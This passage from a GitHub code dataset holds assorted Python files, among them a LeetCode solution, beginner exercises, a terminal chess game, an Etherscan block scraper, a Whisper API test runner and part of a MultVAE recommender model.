labels\n","repo_name":"IshitaTakeshi/Louds-Trie","sub_path":"python/constructor.py","file_name":"constructor.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"76"} +{"seq_id":"4966091733","text":"from collections import Counter\n\nclass Solution:\n    def canTransform(self, start: str, end: str) -> bool:\n        # If the two strings have different letter counts, return False\n        if Counter(start) != Counter(end):\n            return False\n\n        # If the relative order of L and R differs between the two strings, return False\n        
if start.replace('X', '') != end.replace('X', ''):\n            return False\n\n        # Indexes of L in start\n        startL = []\n        # Indexes of R in start\n        startR = []\n        # Indexes of L in end\n        endL = []\n        # Indexes of R in end\n        endR = []\n\n        # Collect the indexes of L and R in both strings\n        for i in range(len(start)):\n            if start[i] == 'L':\n                startL.append(i)\n            elif start[i] == 'R':\n                startR.append(i)\n        for i in range(len(end)):\n            if end[i] == 'L':\n                endL.append(i)\n            elif end[i] == 'R':\n                endR.append(i)\n\n        # XL -> LX is allowed, but LX -> XL is not\n        # Therefore, each L index in start must be >= its counterpart in end\n        for i, j in zip(startL, endL):\n            if i < j:\n                return False\n        \n        # RX -> XR is allowed, but XR -> RX is not\n        # Therefore, each R index in start must be <= its counterpart in end\n        for i, j in zip(startR, endR):\n            if i > j:\n                return False\n\n        return True\n","repo_name":"2142022/Algorithm","sub_path":"LeetCode/Python/[Medium] 777 Swap Adjacent in LR String/Swap Adjacent in LR String.py","file_name":"Swap Adjacent in LR String.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"25257969401","text":"#Check whether a condition is greater than.\nbalance = 500\nif balance > 0:\n    print(\"you can pay\")\nelse:\n    print(\"you have no balance\")\n\n#Likes\nlikes = 200\nif likes >= 200:\n    print(\"congratulations, you have reached 200 likes\")\nelse:\n    print(\"You almost reached 200 likes\")\n\n#If with text\nlenguaje = \"php\"\nif not lenguaje == \"python\":\n    print(\"excellent decision\")\n\n#Evaluate a Boolean.\nusuario_autenticado = True\nif usuario_autenticado:\n    print(\"You have accessed the system\")\n\nelse:\n    print(\"you must log in\") \n\n#Evaluate an element of a list.\nlenguajes = [\"Python\", \"Php\", \"JavaScript\", \"Java\", \"GO\"]\nif \"GO\" in lenguajes:\n    print(\"Go does exist\")\nelse:\n    print(\"It is not in the list\")\n\n#Nested ifs.\nusuario_autenticado = False\nusuario_admin = False\nif usuario_autenticado:\n    if usuario_admin:\n        print(\"FULL ACCESS\")\n    else:\n        print(\"Access to the system\")\nelse:\n    print(\"you must log in\") \n\n\n","repo_name":"nicolazZ02/playlist_python","sub_path":"08-condicionales.py","file_name":"08-condicionales.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23886419096","text":"import re\r\nipz = '10.1.192.38'\r\ns = []\r\nwith open('log.txt', 'r') as f:\r\n    for line in f:\r\n        if line.split()[0] == ipz:\r\n            match = re.search(r'sid=/(\\S+)/&', line)\r\n            s.append(match.group(1))\r\nsor = sorted(s)\r\nfor sid in sor: print(sid)","repo_name":"mysticms/testtask","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"13480404407","text":"import argparse\nimport datetime\n\nfrom whisper_automatic_test.metrics_analyzer import MetricsAnalyzer\nfrom whisper_automatic_test.quality_indexes_analyzer import QualityIndexesAnalyzer\nfrom whisper_automatic_test.scenario_reader import get_scenarios_from_csv_file\nfrom whisper_automatic_test.scenarios_runner import ScenariosRunner\nfrom whisper_automatic_test.suggestions_responses_analyzer import SuggestionsResponsesAnalyzer\nfrom whisper_automatic_test.utility import get_requests, get_flat_suggestions_responses\nfrom whisper_automatic_test.whisper_api_adapter.recommenders import RecommenderType\nfrom whisper_automatic_test.whisper_api_adapter.whisper_api_adapter import get_suggestions_endpoint, \\\n    
get_whisper_api_version\nfrom whisper_automatic_test.whisper_api_adapter.whisper_api_adapter import get_suggestions_from_whisper_api\n\n\ndef run_whisper_automatic_test_for_each_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios):\n for used_recommender in RecommenderType:\n print('Testing recommender: ', used_recommender)\n run_whisper_automatic_test(whisper_api_base_url, whisper_api_version, is_verbose, scenarios, [used_recommender])\n\n\ndef run_whisper_automatic_test_for_all_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios):\n run_whisper_automatic_test(whisper_api_base_url, whisper_api_version, is_verbose, scenarios)\n\n\ndef main():\n program_arguments = get_program_arguments()\n scenarios_csv_file_path = program_arguments.scenarios_csv_file_path\n whisper_api_base_url = program_arguments.whisper_api_base_url\n is_verbose = program_arguments.verbose\n for_each_recommender = program_arguments.for_each_recommender\n whisper_api_version = get_whisper_api_version(whisper_api_base_url)\n scenarios = get_scenarios_from_csv_file(scenarios_csv_file_path)\n\n if for_each_recommender:\n run_whisper_automatic_test_for_each_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios)\n else:\n run_whisper_automatic_test_for_all_recommender(whisper_api_base_url, whisper_api_version, is_verbose, scenarios)\n\n\ndef run_whisper_automatic_test(\n whisper_api_base_url,\n whisper_api_version,\n is_verbose,\n scenarios,\n used_recommenders=None):\n def get_suggestions(request, chatkey):\n return get_suggestions_from_whisper_api(\n whisper_api_version,\n get_suggestions_endpoint(whisper_api_base_url),\n request,\n chatkey,\n used_recommenders\n )\n\n scenario_runner = ScenariosRunner(get_suggestions, get_time)\n suggestions_responses = scenario_runner.run(scenarios)\n suggestions_responses_analyzer = SuggestionsResponsesAnalyzer(scenarios, suggestions_responses)\n metrics_analyzer = MetricsAnalyzer(scenarios, suggestions_responses)\n quality_indexes_analyzer = QualityIndexesAnalyzer(metrics_analyzer)\n print_suggestions_responses_analysis(suggestions_responses_analyzer)\n print_metrics(metrics_analyzer)\n print_quality_indexes(quality_indexes_analyzer)\n if is_verbose:\n print_failing_requests_information(suggestions_responses_analyzer, scenarios, suggestions_responses)\n\n\ndef get_program_arguments():\n arguments_parser = argparse.ArgumentParser(description='Whisper automatic test runner.')\n arguments_parser.add_argument(\n '-s', '--scenarios-csv-file-path',\n action='store',\n required=True,\n help='Path to the scenarios CSV file',\n metavar='FILE'\n )\n arguments_parser.add_argument(\n '-w', '--whisper-api-base-url',\n action='store',\n required=True,\n help='Whisper API base URL',\n metavar='URL'\n )\n arguments_parser.add_argument(\n '-e', '--for-each-recommender',\n action='store_true',\n help='Run the test separately for each recommender',\n )\n arguments_parser.add_argument(\n '-v', '--verbose',\n action='store_true',\n help='Print more information',\n )\n return arguments_parser.parse_args()\n\n\ndef get_time():\n return datetime.datetime.utcnow()\n\n\ndef print_suggestions_responses_analysis(suggestions_responses_analyzer):\n print('Scenario results')\n print('=' * 80)\n print(suggestions_responses_analyzer.analyze_to_string())\n print()\n\n\ndef print_metrics(metrics_analyzer):\n metric_name_and_value_pairs = [\n ('Average system response time', metrics_analyzer.calculate_average_system_response_time()),\n ('Total number 
of messages', metrics_analyzer.calculate_messages_number()),\n ('Mean position of selected suggestions', metrics_analyzer.calculate_mean_position_of_selected_suggestions()),\n ('Total number of suggestions updates', metrics_analyzer.calculate_total_number_of_suggestions_updates()),\n ('Number of unwanted suggestions updates', metrics_analyzer.calculate_number_of_unwanted_suggestions_updates()),\n ('Number of selected suggestions', metrics_analyzer.calculate_number_of_selected_suggestions()),\n ('Number of suggested questions', metrics_analyzer.calculate_number_of_suggested_questions()),\n ('Number of suggested links', metrics_analyzer.calculate_number_of_suggested_links()),\n (\n 'Mean confidence level of selected suggestions',\n metrics_analyzer.calculate_mean_confidence_level_of_selected_suggestions()\n )\n ]\n\n print('Metrics')\n print('=' * 80)\n for metric_name_and_value_pair in metric_name_and_value_pairs:\n metric_name = metric_name_and_value_pair[0]\n metric_value = metric_name_and_value_pair[1]\n print(metric_name, \": \", metric_value)\n print()\n\n\ndef print_quality_indexes(quality_indexes_analyzer):\n pertinence_index = quality_indexes_analyzer.get_pertinence_index()\n speed_index = quality_indexes_analyzer.get_speed_index()\n quality_index_name_and_value_pairs = [\n ('Pertinence index', pertinence_index),\n ('Speed index', speed_index),\n (\n 'Relative confidence level accuracy index',\n quality_indexes_analyzer.get_relative_confidence_level_accuracy_index()),\n ('Intent accuracy index', quality_indexes_analyzer.get_intent_accuracy_index()),\n ('Confidence index', quality_indexes_analyzer.get_confidence_index()),\n ]\n average_quality_index = (\n sum(\n quality_index_name_and_value_pair[1]\n for quality_index_name_and_value_pair in quality_index_name_and_value_pairs\n ) / len(quality_index_name_and_value_pairs)\n )\n simple_quality_index = (\n pertinence_index +\n speed_index\n ) / 2.0\n\n print('Quality indexes')\n print('=' * 80)\n for quality_index_name_and_value_pair in quality_index_name_and_value_pairs:\n quality_index_name = quality_index_name_and_value_pair[0]\n quality_index_value = quality_index_name_and_value_pair[1]\n print(quality_index_name, \": \", quality_index_value)\n\n print('Average quality index: ', average_quality_index)\n print('Simple quality index (average of pertinence and speed indexes): ', simple_quality_index)\n print()\n\n\ndef print_failing_requests_information(suggestions_responses_analyzer, scenarios, suggestions_responses):\n failing_requests = get_failing_requests(scenarios, suggestions_responses, suggestions_responses_analyzer)\n failing_requests_information_messages = [\n 'Request #{}. Expected: {}. 
Actual suggestions: {}.'.format(\n failing_request['index'],\n failing_request['expected'],\n failing_request['suggestions']\n )\n for failing_request in failing_requests\n ]\n print('Failing requests')\n print('=' * 80)\n print('\\n'.join(failing_requests_information_messages))\n print()\n\n\ndef get_failing_requests(scenarios, suggestions_responses, suggestions_responses_analyzer):\n requests = get_requests(scenarios)\n flat_suggestions_responses = get_flat_suggestions_responses(suggestions_responses)\n requests_analysis = suggestions_responses_analyzer.analyze_scenarios()\n failing_requests = [\n {\n 'index': i,\n 'expected': '{{success_condition: {}, data: {}}}'.format(\n requests[i].get_success_condition(),\n requests[i].get_data()\n ),\n 'suggestions': flat_suggestions_responses[i].get_suggestions()\n }\n for i, request_analysis in enumerate(requests_analysis)\n if request_analysis.startswith('fail')\n ]\n return failing_requests\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"CoveoWhisper/WhisperAutomaticTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9452600015","text":"def distCandy(candies) :\n res = []\n for i in candies :\n if i not in res :\n res.append(i)\n if len(res) < len(candies)//2 :\n return len(res)\n else :\n return len(candies)//2\n \n\n# cand = [1,1,2,2,3,3]\ncand = [1,1,2,3,3,4,5]\nprint(distCandy(cand))","repo_name":"vxela/altera-batch5-","sub_path":"Labs/DistributeCandies.py","file_name":"DistributeCandies.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37320836003","text":"def singleton(cls, *args, **kwargs):\n instance = {}\n def _singleton():\n if cls not in instance:\n instance[cls] = cls(*args, **kwargs)\n return instance[cls]\n return _singleton\n\n@singleton\nclass Test(object):\n a = 1\n\ntest = Test()\ntest1 = Test()\na = id(test)\nb = id(test1)\nprint(a)\n\nprint(id(test) == id(test1))","repo_name":"stephenchow007/django-test","sub_path":"aaaa.py","file_name":"aaaa.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"9947008638","text":"import sys\nsys.path.insert(0, '../')\nimport mysqlconnect\ncon = mysqlconnect.Connector()\nimport random\n\n\"\"\"\n // Initialize and add the map\n // 1 deg is around 110 km\n // 0.1 deg is around 110/10 i.e 10 km\n // 0.1 is around 10 km radius (approx)\n\"\"\"\n\ndef getNearby(n, loc, min=-0.1, max=0.1):\n locations = []\n lat, lng = loc['lat'], loc['lng']\n epsilon = 0.0\n for i in range(0, n):\n epsilon = random.random() * (max - min) + min;\n lat += epsilon;\n epsilon = random.random() * (max - min) + min;\n lng += epsilon;\n locations.append({\n 'lat': lat, 'lng': lng\n })\n return locations\n\n\n_LAHORE_LOCATION = {\n 'lat': 31.474221,\n 'lng': 74.376440\n}\n\ndef generator(n):\n if (n < 1):\n return\n user_list = con.query_to_list('select id from user')\n\n BUNCH_CENTER = [{\n 'lat': 31.538009,\n 'lng': 74.328593,\n 'label': 'Shadman'\n }, {\n 'lat': 31.501749,\n 'lng': 74.361698,\n 'label': 'Cavlary Ground'\n }, {\n 'lat': 31.474221,\n 'lng': 74.376440,\n 'label': 'DHA Phase 4'\n }];\n\n\n locations = []\n n = int((1/3)*n)\n for l in BUNCH_CENTER:\n locations += getNearby(n, l)\n\n print('generating ', n * len(BUNCH_CENTER), ' locations')\n 
users = []\n    for loc in locations:\n        user_pick_index = random.randint(0, len(user_list) - 1)\n        user_id = user_list[user_pick_index][0]\n        users.append(user_id)\n\n        qry = \"\"\"\n            INSERT INTO user_locations VALUES(NULL, %s, %s, NULL, %s)\n        \"\"\"\n        con.query_insert(qry, (loc['lat'], loc['lng'], user_id))\n\n    print(\"for \", len(set(users)), \" users\")","repo_name":"zainulabidin302/foodpool-scripts","sub_path":"data_gen/user_locations_generator.py","file_name":"user_locations_generator.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7687091225","text":"import copy\nimport os\nimport place_piece\nimport how_far\n\n\ndead_white_pieces = []\ndead_black_pieces = []\n\n\ndef create_board(): \n    board = []\n    for i in range(8):\n        ligne = []\n        for j in range(8):\n            if j % 2 == i % 2:\n                #ligne.append(f\"{chr(j + 97)}{i + 1}\")\n                ligne.append(\"+\")\n            else:\n                #ligne.append(f\"{chr(j + 97)}{i + 1}\")\n                ligne.append(\" \")\n        board.append(ligne)\n    return board\n\ndef display_board(board, pieces): # pieces = [[0, 1, \"W\"], [2, 3, \"B\"]]\n    tmp = copy.deepcopy(board)\n\n    for piece in pieces:\n        tmp[piece[1]][piece[0]] = piece[2]\n\n    tmp.reverse()\n    for lign in tmp:\n        print(' '.join(lign))\n\ndef count_score(arr):\n    score = 0\n\n    for piece in arr:\n        if piece == \"♙\" or piece == \"♟\":\n            score += 1\n        if piece == \"♖\" or piece == \"♜\":\n            score += 5 \n        if piece == \"♘\" or piece == \"♞\":\n            score += 3\n        if piece == \"♗\" or piece == \"♝\":\n            score += 3\n        if piece == \"♕\" or piece == \"♛\":\n            score += 9\n\n    return score\n\ndef compare_scores(num_1, num_2):\n    if num_1 == num_2:\n        return f\"  \", f\"  \"\n    if num_1 > num_2:\n        return f\"+{num_1 - num_2}\", \"  \"\n    else:\n        return \"  \", f\"+{num_2 - num_1}\"\n\ndef is_free(x, y, arr, moving_piece): # we consider a square occupied by an enemy piece as free (returns 2)\n    for index, piece in enumerate(arr):\n        if piece[0] == x and piece[1] == y: # Checks if the piece is on the destination square\n            if piece[5] != moving_piece[5]: # Checks if the piece belongs to the opponent\n                return (2, index)\n            else:\n                print(\"square is occupied by one of your pieces\")\n                return (0, 0)\n    return (1, 0) #free of any piece\n\ndef is_knight_move(start_pos, end_pos):\n    if abs(start_pos[0] - end_pos[0]) == 1:\n        if abs(start_pos[1] - end_pos[1]) == 2:\n            return 1\n    if abs(start_pos[0] - end_pos[0]) == 2:\n        if abs(start_pos[1] - end_pos[1]) == 1:\n            return 1\n    return 0\n\ndef what_trajectory(start_pos, end_pos):\n    if is_knight_move(start_pos, end_pos):\n        return(\"k\", 1)\n    if how_far.horizontally(start_pos, end_pos):\n        return (\"h\", how_far.horizontally(start_pos, end_pos))\n    if how_far.vertically(start_pos, end_pos):\n        return (\"v\", how_far.vertically(start_pos, end_pos))\n    if how_far.diagonally(start_pos, end_pos):\n        return (\"d\", how_far.diagonally(start_pos, end_pos))\n    return \"not a move\"\n\ndef is_way_free(start_pos, end_pos, arr):\n    traj = what_trajectory(start_pos, end_pos) # ex: (\"v\", 5)\n    biggest_y = int(max(start_pos[1], end_pos[1]))\n    smallest_y = int(min(start_pos[1], end_pos[1]))\n    biggest_x = max(start_pos[0], end_pos[0])\n    smallest_x = min(start_pos[0], end_pos[0])\n\n    if traj[0] == \"v\":\n        for piece in arr:\n            if piece[0] == end_pos[0] and piece[1] > smallest_y and piece[1] < biggest_y:\n                print(\"vertical not free\")\n                return 0\n        return 1\n    if traj[0] == \"h\":\n        for piece in arr:\n            if piece[1] == biggest_y and piece[0] > smallest_x and piece[0] < biggest_x:\n                
print(\"horizontal not free\")\n print(f\"piece captures {piece[2]}\")\n return 0\n return 1\n if traj[0] == \"d\":\n for piece in arr:\n piece_coords = []\n piece_coords.append(piece[0])\n piece_coords.append(piece[1])\n if how_far.diagonally(piece_coords, start_pos) and how_far.diagonally(piece_coords, end_pos) and piece[0] > smallest_x and piece[0] < biggest_x:\n print(\"diagonal not free\")\n print(f\"piece captures {piece[2]}\")\n return 0\n return 1\n\ndef pawn_promotes(piece, end_x):\n print(\"1 = queen, 2 = rook, 3 = knight, 4 = bishop\")\n #choice = input(\"What do you wish to promote your pawn to?\")\n if piece[5] == 1: # if pawn is white\n piece = [end_x, 7, \"♕\", [\"h\", \"v\", \"d\"], 7, 1]\n else: # if pawn isn't white\n piece = [end_x, 0, \"♛\", [\"h\", \"v\", \"d\"], 7, 1]\n\n return piece\n\ndef get_command(): # Checks for conformity of user input with expected args\n while True:\n move = input(\"Move it\")\n if len(move) != 4:\n continue\n x1 = move[0]\n y1 = move[1]\n x2 = move[2]\n y2 = move[3]\n try:\n y1 = int(y1)\n y2 = int(y2)\n except:\n print('Input should look like this: \"a1h8\"')\n continue\n if y1 < 1 or y1 > 8 or y2 < 1 or y2 > 8:\n print(\"Rows are within 1 and 8\")\n continue\n if x1 < 'a' or x1 > 'h' or x2 < 'a' or x2 > 'h':\n print(\"Columns are between A and H\")\n continue\n\n break\n return(move)\n\n\nbd = create_board()\n\npiece_arr = []\nplace_piece.place_pieces(piece_arr)\n\n\nwhile True:\n w_score = count_score(dead_white_pieces)\n b_score = count_score(dead_black_pieces)\n score = compare_scores(w_score, b_score)\n print(f\"{score[0]} Captured white pieces: {' '.join(dead_white_pieces)}\")\n\n display_board(bd, piece_arr)\n\n print(f\"{score[1]} Captured black pieces: {' '.join(dead_black_pieces)}\")\n\n move = get_command()\n os.system('cls' if os.name == 'nt' else 'clear') # Clears terminal before displaying board again\n\n\n start_x = ord(move[0]) - ord('a') # ex: h8h1 --> 7 7 7 0\n start_y = int(move[1]) - 1\n end_x = ord(move[2]) - ord('a')\n end_y = int(move[3]) - 1\n\n start_pos = (start_x, start_y) # (7, 7)\n end_pos = (end_x, end_y) # (7, 0)\n\n\n for piece in piece_arr:\n if not (piece[0] == start_x and piece[1] == start_y): # if the piece is not on start square\n continue # it won't be the one we want to move\n\n if not(is_way_free(start_pos, end_pos, piece_arr) or piece[2] == \"♘\" or piece[2] == \"♞\"):\n continue # if trajectory is not free and piece is not knight\n\n if not (what_trajectory(start_pos, end_pos)[0] in piece[3] and what_trajectory(start_pos, end_pos)[1] <= piece[4]):\n print(\"that piece does not move like that, or that far\")\n continue # Compares piece's allowed movements, to kind of trajectory and range\n\n if not (is_free(end_x, end_y, piece_arr, piece)[0]): # checks if the end square is free of any piece of mine\n continue\n\n if piece[2] == '♙' or piece[2] == '♟':\n if is_free(end_x, end_y, piece_arr, piece)[0] == 1:\n if end_y == 7 or end_y == 0:\n new_piece = pawn_promotes(piece, end_x)\n piece_arr.remove(piece)\n piece_arr.append(new_piece)\n piece[0] = end_x # If all the conditions match, move the piece\n piece[1] = end_y\n piece[4] = 1\n \n continue\n\n if is_free(end_x, end_y, piece_arr, piece)[0] == 2:\n piece_on_end_square = piece_arr[is_free(end_x, end_y, piece_arr, piece)[1]]\n print(f\"{piece[2]} takes {piece_on_end_square[2]}\")\n if piece_on_end_square[5] == 1: # 1 == white\n dead_white_pieces.append(piece_on_end_square[2])\n else:\n dead_black_pieces.append(piece_on_end_square[2])\n 
piece_arr.remove(piece_on_end_square)\n\n        piece[0] = end_x # If all the conditions match, move the piece\n        piece[1] = end_y\n        break\n","repo_name":"JennaHuff/public-chess","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18302059938","text":"# This function squares every digit of a number.\n\ndef square_digits(num):\n    final=[]\n    x=map(int, str(num))\n    for y in x:\n        y=y**2\n        final.append(y)\n    final=map(str, final)\n    return int(''.join(final))\n","repo_name":"SaashaJoshi/Python","sub_path":"Methods and Functions/listToInt.py","file_name":"listToInt.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"1991209968","text":"from dataclasses import dataclass, field\nfrom parse import parse\n\nfrom .argument import Argument, EnumArgument\nfrom .device import Device\nfrom .parser import Parser, UTILITY\n\n\njump_fmt = '{addr}'\ncondition_fmt = '{cond} ? {left} : {right}'.replace(' ', '{:os}')\n\n\nconditions = {\n    value: idx for idx, value in enumerate(\n        ['F', 'Z1', 'Z2', 'Z1 && Z2', 'X1', 'X2', 'X3', 'X4']\n    )\n}\n\n\ndef _addr(s: str):\n    s = s.strip('A')\n    \n    return int(s)\n\n\n@dataclass\nclass TransitionalParser(Parser):\n    Addr1: Argument\n    Addr2: Argument\n    Flags: EnumArgument\n    End: Argument\n\n    _devices: list[Device] = field(default_factory=list, init=False)\n    \n    def parse_line(self, line: str):\n        result = parse(condition_fmt, line, UTILITY)\n        \n        if result is None:\n            result = parse(jump_fmt, line, UTILITY)\n            \n            assert result is not None, f\"Unknown transition: {line}\"\n            \n            if result['addr'] == 'END':\n                return {\n                    'End': '1'\n                }\n            \n            return {\n                'Addr1': f\"{_addr(result['addr']):b}\",\n                'Addr2': f\"{_addr(result['addr']):b}\",\n            }\n\n        assert result is not None, f\"Unknown transition: {line}\"\n\n        return {\n            'Addr1': f\"{_addr(result['left']):b}\",\n            'Addr2': f\"{_addr(result['right']):b}\",\n            'Flags': result['cond']\n        }\n\n    def feed(self, idx: int, code: str):\n        try:\n            data = self.parse_line(code)\n        except Exception as e:\n            raise RuntimeError(f\"Line {idx} error: {e}\") from e\n        \n        # print(data)\n        \n        data = {\n            key: value\n            for mapping in [\n                getattr(self, arg).create(data[arg], reverse=True)\n                if arg in data else\n                getattr(self, arg).create_default(reverse=True)\n                for arg in [\n                    'Addr1', 'Addr2', 'Flags', 'End'\n                ] if getattr(self, arg)\n            ]\n            for key, value in mapping.items()\n        }\n        \n        self.feed_devices(idx, **data)\n","repo_name":"mocurin/asvt-hw-3-encoder","sub_path":"src/transitional_parser.py","file_name":"transitional_parser.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14565574624","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\nimport binascii as bina\nimport struct\nimport sys\n\ndef gather_blockinfo(nblock):\n#    print nblock\n    url = \"https://etherscan.io/block/\" + str(nblock)\n    source = requests.get(url)\n    #print source.text\n    soup = BeautifulSoup(source.text, 'lxml')\n    table = soup.find(id=\"ContentPlaceHolder1_maintable\")\n    item = table.find_all('div')\n    count = 1\n    result = \"\"\n\n\n    for i in item:\n        #diff\n        if count == 16:\n            #print int(re.sub(',','', i.text))\n            #print hex(int(re.sub(',','', i.text)))\n            result = str(hex(int(re.sub(',','', i.text))))\n            hex_int = int(result[2:], 16)\n            result_binary = 
\"{0:b}\".format(hex_int).zfill(64)\n for i in range(0,63):\n training_data.write(result_binary[i])\n training_data.write(\", \")\n training_data.write(result_binary[63])\n training_data.write(\"\\r\\n\")\n #print result_binary\n #nonce\n if count is 26:\n result = str(i.text)\n #print result\n hex_int = int(result[2:], 16)\n result_binary = \"{0:b}\".format(hex_int).zfill(64)\n for i in range(0,63):\n label_data.write(result_binary[i])\n label_data.write(\", \")\n label_data.write(result_binary[63])\n label_data.write(\"\\r\\n\")\n #print result_binary\n\n count += 1\n\n\ntraining_data = open(\"training_input_data.txt\",'a+')\nlabel_data = open(\"training_label_data.txt\",'a+')\nfor i in range(5000000 + int(sys.argv[1]), 5960300):\n gather_blockinfo(i)\n\ntraining_data.close()\nlabel_data.close()\n","repo_name":"NAKsir-melody/eth-function-tests","sub_path":"go-ethai/trainingset_crawl.py","file_name":"trainingset_crawl.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10414302059","text":"import math\n\ndef ilosc_opakowan_paneli(dl_podlogi, szer_podlogi, dl_panela, szer_panela, ilosc_paneli_w_opakowaniu):\n pow_podlogi = dl_podlogi * szer_podlogi\n pow_pomieszczenia = pow_podlogi * 1.1\n pow_panela = dl_panela * szer_panela\n ilosc_paneli = math.ceil(pow_pomieszczenia / pow_panela)\n ilosc_opakowan = math.ceil(ilosc_paneli / ilosc_paneli_w_opakowaniu)\n return ilosc_opakowan\n\nprint(ilosc_opakowan_paneli(5, 4, 1, 0.5, 10));","repo_name":"s25465JakubJarczyk/PPY","sub_path":"PPY-Zadanie4/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44193933948","text":"import time\nimport os \nfrom workers.WikiWorker import WikiWorker\nfrom yaml_reader import YamlPipelineExecutor\n\ndef main():\n scraper_start_time = time.time()\n\n dir_path = os.path.dirname(os.path.realpath(__file__))\n pipeline_location = os.path.join(dir_path,'pipelines','wiki_yahoo_scrapper_pipeline.yaml')\n yamlPipelineExecutor = YamlPipelineExecutor(pipeline_location = pipeline_location)\n yamlPipelineExecutor.process_pipline()\n\n yamlPipelineExecutor._join_workers()\n\n print('Extracting time took:', round(time.time() - scraper_start_time, 1))\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlonSpinner/ConcurrentProgramming","sub_path":"threading/11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"9937139102","text":"\"\"\"\nDawen Liang et al., Variational Autoencoders for Collaborative Filtering. 
WWW 2018.\nhttps://arxiv.org/pdf/1802.05814\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\nfrom .BaseModel import BaseModel\nfrom data.generators import MatrixGenerator\n\nclass MultVAE(BaseModel):\n    def __init__(self, dataset, hparams, device):\n        super(MultVAE, self).__init__()\n        self.num_users = dataset.num_users\n        self.num_items = dataset.num_items\n        \n        if isinstance(hparams['enc_dims'], str):\n            hparams['enc_dims'] = eval(hparams['enc_dims'])\n        self.enc_dims = [self.num_items] + list(hparams['enc_dims'])\n        self.dec_dims = self.enc_dims[::-1]\n        self.dims = self.enc_dims + self.dec_dims[1:]\n\n        self.total_anneal_steps = hparams['total_anneal_steps']\n        self.anneal_cap = hparams['anneal_cap']\n\n        self.dropout = hparams['dropout']\n\n        self.eps = 1e-6\n        self.anneal = 0.\n        self.update_count = 0\n\n        self.device = device\n\n        self.encoder = nn.ModuleList()\n        for i, (d_in, d_out) in enumerate(zip(self.enc_dims[:-1], self.enc_dims[1:])):\n            if i == len(self.enc_dims[:-1]) - 1:\n                d_out *= 2\n            self.encoder.append(nn.Linear(d_in, d_out))\n            if i != len(self.enc_dims[:-1]) - 1:\n                self.encoder.append(nn.Tanh())\n\n        self.decoder = nn.ModuleList()\n        for i, (d_in, d_out) in enumerate(zip(self.dec_dims[:-1], self.dec_dims[1:])):\n            self.decoder.append(nn.Linear(d_in, d_out))\n            if i != len(self.dec_dims[:-1]) - 1:\n                self.decoder.append(nn.Tanh())\n\n        self.to(self.device)\n\n        self.optimizer = torch.optim.Adam(self.parameters(), lr=0.001)\n\n    def forward(self, rating_matrix):\n        # encoder\n        h = F.dropout(F.normalize(rating_matrix), p=self.dropout, training=self.training)\n        for layer in self.encoder:\n            h = layer(h)\n\n        # sample\n        mu_q = h[:, :self.enc_dims[-1]]\n        logvar_q = h[:, self.enc_dims[-1]:]  # log sigma^2, batch x 200\n        std_q = torch.exp(0.5 * logvar_q)  # sigma, batch x 200\n\n        epsilon = torch.zeros_like(std_q).normal_(mean=0, std=0.01)\n        sampled_z = mu_q + self.training * epsilon * std_q\n\n        output = sampled_z\n        for layer in self.decoder:\n            output = layer(output)\n\n        if self.training:\n            kl_loss = ((0.5 * (-logvar_q + torch.exp(logvar_q) + torch.pow(mu_q, 2) - 1)).sum(1)).mean()\n            return output, kl_loss\n        else:\n            return output\n\n    def fit(self, dataset, exp_config, evaluator=None, early_stop=None, loggers=None):\n        # user, item, rating pairs\n        train_matrix = dataset.train_data\n\n        num_training = train_matrix.shape[0]\n        num_batches = int(np.ceil(num_training / exp_config.batch_size))\n\n        batch_generator = MatrixGenerator(train_matrix, batch_size=exp_config.batch_size, shuffle=True, device=self.device)\n        \n        for epoch in range(1, exp_config.num_epochs + 1):\n            self.train()\n            epoch_loss = 0.0\n            for b, batch_matrix in enumerate(batch_generator):\n                self.optimizer.zero_grad()\n\n                if self.total_anneal_steps > 0:\n                    self.anneal = min(self.anneal_cap, 1. 
